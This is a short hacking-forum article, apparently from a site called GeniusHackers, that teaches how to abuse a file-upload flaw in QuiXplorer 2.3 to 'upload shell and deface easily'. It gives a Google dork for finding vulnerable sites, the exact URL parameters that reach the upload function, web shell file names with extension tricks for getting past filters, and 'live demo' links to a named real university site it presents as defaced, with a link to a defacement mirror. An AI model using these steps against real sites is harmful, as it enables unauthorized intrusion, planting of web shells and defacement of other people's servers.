QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability Upload shell and deface easily - Exploits and Vulenrablities - Web Hacking - Hacking

Main » Articles » Web Hacking » Exploits and Vulenrablities

QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability Upload shell and deface easily

open Google.com and type this dork
intitle:"QuiXplorer 2.3 - the QuiX project"

you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity

http://[localhost]/[path]/index.php?action=list&order=name&srt=yes

http://site.com/[xyz]/index.php?action=list&order=name&srt=yes

 after Going to this you will saw a file manager

you can upload your files here

find this edit file create file etc icons in page and click on last, its upload option

You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example :

http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file

click On you file For view

Live demo :

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/

i know some asshole will chnage the deface

so its mirrOr of defacements http://attack-h.org/attack/?id=8452

Category: Exploits and Vulenrablities | Added by: 3x3r00t (12.02.22) | Author: 3X3.R()()T

Views: 980 | Rating: 4.0/1

Total comments: 0

Only registered users can add comments.
[ Registration | Login ]

Recommend on Google

Follow @geniushackers

GeniusHackers

Founder and CEO of GeniusHackers [#] /3x3.R()()T

Hosted by uCoz

Search this site

Adds

Subscribe

3D Tag Cloud